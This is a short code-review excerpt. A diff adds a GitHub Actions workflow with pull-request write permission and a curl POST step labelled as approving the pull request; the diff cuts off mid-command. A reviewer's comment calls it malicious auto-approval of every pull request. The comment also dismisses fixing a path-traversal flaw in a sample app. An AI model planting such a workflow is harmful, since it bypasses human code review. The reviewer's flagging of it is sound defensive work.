.github/workflows/test.yml

```diff
@@ -0,0 +1,14 @@
+name: TEST
+on: pull_request # run on pull request events
+permissions:
+  pull-requests: write # grant write permission on the pull-requests endpoint
+jobs:
+  approve:
+    runs-on: ubuntu-latest
+    steps:
+     - run: | # approve the pull request
+        curl --request POST \
```

Comment:
@marazzax ,
This looks like malicious code to automatically approve every pull request.

I don't know what is your intension here, looks very suspicious.

And no point of fixing path traversal in sample app, it will never run in production.